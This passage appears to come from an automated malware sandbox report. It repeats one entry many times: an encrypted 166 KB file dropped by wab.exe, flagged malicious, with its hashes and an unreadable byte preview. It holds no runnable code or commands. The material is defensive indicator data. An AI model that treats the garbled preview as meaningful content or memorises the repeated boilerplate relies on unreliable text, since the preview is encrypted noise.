                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
